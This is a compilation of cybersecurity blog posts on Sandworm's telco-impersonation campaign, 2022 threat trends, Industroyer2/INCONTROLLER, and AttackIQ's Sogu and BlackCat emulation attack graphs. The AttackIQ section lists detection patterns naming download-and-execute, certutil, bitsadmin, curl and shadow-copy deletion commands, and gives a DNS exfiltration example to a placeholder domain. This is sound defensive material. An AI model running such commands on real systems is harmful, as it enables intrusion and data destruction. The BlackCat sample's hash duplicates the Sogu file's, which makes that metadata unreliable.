Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops Blink.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.

In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.

From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).

The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.

State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.

“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware.” reads the report published by Recorded Future.

While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.

Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.

The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.

The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.

Experts noticed the presence of the same web page on multiple domains, it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.

Sandworm

The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited. The threat actors used the HTML smuggling technique. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 and JavaScript features. The malicious payloads are delivered via encoded strings in an HTML attachment or webpage. The malicious HTML code is generated within the browser on the target device which is already inside the security perimeter of the victim’s network.

The researchers published a report that includes details about the malware and the C2 infrastructure.

The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:

Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.

Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.

Cybercriminals and state-sponsored threat actors

The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).

Figure 1 – Malicious requests by threat actor country of origin

Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).

We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.

The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spiderand Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.

The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.

Figure 2 - Malicious requests by targeted sector
Figure 2 – Malicious requests by targeted sector

New malware – wipers, OT/ICS malware and botnets

Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which is still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemicby a new DHS Cyber Safety Review Board.

The most interesting malware developments typically garner attention because of new malicious capabilities, who isdeploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.

Destructive wipers

Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.

OT/ICS-specific malware

OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.

Persistent and emerging botnets

Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNfilter, was active since 2019 but discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.

Remote Access Trojan (RAT)

ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.

Hacking groups

Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.

Hacktivists

More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.

Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.

Data extortion groups

LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.

Mitigation recommendations

The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.

The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:

Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. Monitor especially known data leaks for exposed credentials.
Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change defaults or easily guessable passwords on these IoT devices.
Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.

Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.

Threat hunting and incident response

Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.

[LEARN MORE]

The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.

serve.php?o=image&a=1296

Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.

In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.

Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:

Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.

In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.

Overview of the new ICS-specific malware

Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.

ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.

Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.

Both new malwares show that abusing often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.

For more information and technical analysis, read the full report.

Read the Full Report

Mitigation recommendations for ICS malware

Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.

Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage and especially possible ping sweeps through the ICMP indicators in the Industrial Threat Library devoted to detect possible port scans and discoveries.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both new malwares for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP) . Below, are specific recommendations for each protocol in eyeInspect.

IEC-104

eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.

OPC UA

Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.

MODBUS/Schneider Electric

Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.

OMRON FINS

Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).

The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.

Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary’s behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware advance. But only if the assessment can be done easily.

Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.

How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.

What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.

Specifically, a malware-based threat assessment helps defensive teams to:

identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.

To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10.000 hrs PT.

Sogu (PlugX)

Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, to include APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade with early reporting as far back as 2008, yet it continues to target victims around the world, to include the semiconductor industry and nation-state governments.

Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.

This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.

Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.

This method and required set of files is commonly seen with Sogu/PlugX variants.

Metadata from the sample analyzed

Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712

Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f

Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93

This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.

Attack Graph Sogu Click for Larger View

Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and or prevent delivery.

1a. Detection Process

Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“DownloadString OR DownloadFile) AND HTTP AND (Invoke-Expression OR IEX)

1b. Mitigation Policies

MITRE recommends the following mitigations for T1566.002:

M1047
M1021
M1054
M1018
M1017

Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.

3a. Detection Process

While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be false positive prone and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate/effective way of detecting this activity on your endpoints:

PlugX / Sogu YARA Rules

3b. Mitigation Policies

Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.

Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable leading to DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and instead of loading the normal benign DLL, a hijacked version is loaded because it resides in the same directory as the McAfee executable.

4a. Detection Process

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the DLL) extracted from the RAR file. This binary name is subject to change
Imageload is_signed == False

4b. Mitigation Policies

MITRE recommends the following mitigations for T1574.002:

M1013
M1051

Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.

Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.

5a. Detection Process

Utilize tools such as Procmon.exe or EDR tools to monitor for system Windows API calls such as “LoadLibrary” and “CreateRemoteThread” with unsigned or unrecognized binaries, especially if they are coming from locations that are globally writable or not belonging to the associated injected process.

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

5b. Mitigation Policies

MITRE recommends the following mitigations for T1055.001:

M1040

Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.

6a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((‘sc’ or ‘sc.exe’) AND ‘create’ AND ‘binpath=”<path to trusted executable>”’ AND start=”auto”)

6b. Mitigation Policies

MITRE recommends the following mitigations for T1543.003:

M1047
M1040
M1045
M1028
M1018

Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.

7a. Detection Process

As registry key modifications is typical for Windows system behavior, it is unusual if you observe registry actions attempted to be carried out by unexpected or underprivileged users. This detection will exclude administrative or expected users to reduce false positives from expected system usage.

Process Name == (cmd.exe or powershell.exe)

User NOT IN <list of expected reg.exe users>

Command Line CONTAINS((reg or reg.exe) AND (“HKEY_CURRENT_USER” OR “KEY_CURRENT_MACHINE”) AND “SOFTWAREMicrosoftWindowsCurrentVersion” AND (“run” OR “runonce”))

7b. Mitigation Policies

Although it is expected Windows behavior for this registry key to be modified for programs to start at boot, modification to these registry keys can be constrained by setting group policy and application control/whitelisting but allowing only authorized users to utilize tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe

Scenario 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.

This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:

ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad

An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.

If the Google DNS resolution fails, potentially due to web proxy or DNS policy disallowing external DNS requests, a fallback callout that is identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts and is sent to AttackIQ infrastructure. This provides defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.

8a. Detection Process

Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.

alert udp any 53 -> $HOME_NET any (msg:”*”; rev:001; content:”|43 D7 41 85|”;)

Please note, the content portion here is a hash representation of the destination IP address for the DNS request (i.e., to the C2). This portion should be modified as IP artifacts are collected.

8b. Mitigation Policies

MITRE recommends the following mitigations for T1071.004:

M1037
M1031

Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.

10a. Detection Process

MITRE detection recommendations for T1056.001:

DS0009
DS0027

Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo

11a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS “systeminfo”
User NOT IN User != [<list of expected administrators to be issuing these commands>]

11b. Mitigation Policies

MITRE mitigation Recommendations for T1059.003:

M1038

Additionally, ensure that Group Policy is set and enforced to allow only authorized users/administrators to be able to run cmd.exe or powershell.exe. These interpreters can be limited to lower privileged or unneeded users to prevent enumeration or abuse.

Scenario 12: Data Exfiltration Over HTTP (T1048.003): In our final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting to an AttackIQ controlled server.

12a. Detection Process

MITRE detection Recommendations for T1048.003:

DS0017
DS0022

12b. Mitigation Policies

MITRE mitigation Recommendations for T1048.003:

M1057
M1037
M1031
M1030

BlackCat (ALPHV) Ransomware

BlackCat (a.k.a ALPHV) emerged as ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable multi-platform ransomware strain written in Rust. BlackCat operators use the double-threat extortion model which not only encrypts victim data but also threatens public exposure of sensitive information that was collected and exfiltrated prior to ransomware deployment.

According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.

The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.

Sample Metadata

Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.

Attack Graph BlackCat Click for Larger View

Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and we emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads and saves a Windows-based BlackCat sample to disk, giving A/V security controls an opportunity to detect inbound tool delivery, as well as uploads to memory.

1a. Detection Process

Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)

Certutil Example:

Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)

Bitsadmin Example:

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

1b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Additionally, it is advised that non administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This will prevent malicious usage of these tools on end user accounts.

Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is grab the host machine’s Windows UUID which is used to build a unique victim identifier for the ransom process. The malware retrieves this piece of information by using a living-off-the-land tool, WMI, to issue the following command “csproduct get UUID”.

3a. Detection Process

Developing a baseline of typical binaries that wmiprvse.exe invokes in your environment, then utilizing that baseline to make a detection is a good step in monitoring abnormal Windows Management Instrumentation activity. For example, creating a detection to alert on processes not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.

Monitoring the endpoint for the following would also alert on possible suspicious use:

Process Name == wmic.exe
Command Line CONTAINS (“Process call create” AND(“.dll” OR “.exe”))

3b. Mitigation Policies

MITRE mitigation Recommendations for T1047:

M1040
M1038
M1026
M1018

Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.

Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s attempt to allow Remote Symbolic Links on the host using the fsutil command. Enabling these remote symbolic links can expand access to remote file locations for encryption as well as create additional pathways for propagation.

4a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“fsutil” AND “SymlinkEvaluation” AND (“R2L:1” OR “R2R:1”))

4b. Mitigation Policies

MITRE mitigation Recommendations for T1562.001:

M1022
M1024
M1018

Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s addition of a registry key that maximizes concurrent network requests made by the host, likely to prevent any hiccups during file encryption of remotely available files. The “MaxMpxCt” key is set to 65535.

5a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“reg” OR “reg.exe”) AND “add” AND “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters” AND “/V MaxMpxCt”)

5b. Mitigation Policies

MITRE mitigation Recommendations for T1112:

M1024

Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies. BlackCat and other ransomware lines make use of this technique to restrict the victim’s ability to restore the encrypted files from backup.

6a. Detection Process

Process Name == vssadmin.exe
Command Line CONTAINS (“delete shadows“)

6b. Mitigation Policies

It is recommended that group policy settings and Application Control/whitelisting software is set to only allow authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe to prevent misusage if an account is compromised.

Additionally, ensure that backup files are set to only be accessed by authorized personnel. These backup files should not have read or write access to underprivileged user accounts.

